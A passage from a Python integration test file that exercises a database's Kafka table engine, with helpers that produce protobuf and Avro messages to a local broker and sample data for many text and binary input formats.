consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x